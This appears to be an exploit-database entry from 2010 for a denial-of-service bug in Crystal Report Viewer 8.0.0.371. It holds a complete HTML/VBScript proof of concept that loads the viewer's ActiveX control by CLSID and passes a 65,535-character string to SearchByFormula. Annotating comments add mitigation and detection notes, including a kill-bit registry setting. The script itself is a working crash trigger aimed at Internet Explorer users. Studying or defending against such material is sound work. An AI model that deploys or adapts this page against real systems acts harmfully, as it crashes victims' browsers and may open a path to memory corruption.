Crystal Report Viewer 8.0.0.371 - ActiveX Denial of Service

Author: Matthew Bergin
type: dos
platform: windows
port: 
date_added: 2010-11-03  
date_updated: 2010-11-03  
verified: 0  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 15408.html  
<html>
Crystal Reporting Viewer v8.0.0.371
Author: Matthew Bergin
Website: www.berginpentesting.com
Website: www.smashthestack.org
<object classid='clsid:C4847596-972C-11D0-9567-00A0C9273C2A' id='target' ></object>
<script language='vbscript'>
' Proof-of-concept test case: calls the SearchByFormula method of the ActiveX
' control instantiated by the <object> tag above (id='target',
' clsid:C4847596-972C-11D0-9567-00A0C9273C2A) with one oversized string.
' The page classifies the result as a denial of service and lists the entry as
' unverified (verified: 0). The root cause is not stated on the page.
' NOTE(review): presumably the control mishandles the length of the formula
' string; confirm under a debugger before treating this as only a crash.
'
' Client-side VBScript is only executed by Internet Explorer, so exposure is
' limited to hosts where that browser (or an embedded IE engine) can load the
' control.
'
' Defender notes:
'  - Mitigation: remove or update the viewer, or set the kill bit for the CLSID
'    above (Compatibility Flags = 0x400 under
'    HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}).
'  - Detection: web content that references this classid and passes a very
'    long argument to SearchByFormula.

' Descriptive metadata about the tested component: DLL path, method prototype,
' method name, ProgID and argument count. Nothing below reads these variables.
targetFile = "C:\WINDOWS\system32\crviewer.dll"
prototype  = "Sub SearchByFormula ( ByVal formula As String )"
memberName = "SearchByFormula"
progid     = "CRVIEWERLib.CRViewer"
argCount   = 1

' Build the test input: a string of 65535 "A" characters.
arg1=String(65535, "A")

' Invoke the method on the embedded control with the oversized formula string.
' This call is the crash trigger claimed by the page title.
target.SearchByFormula arg1

</script>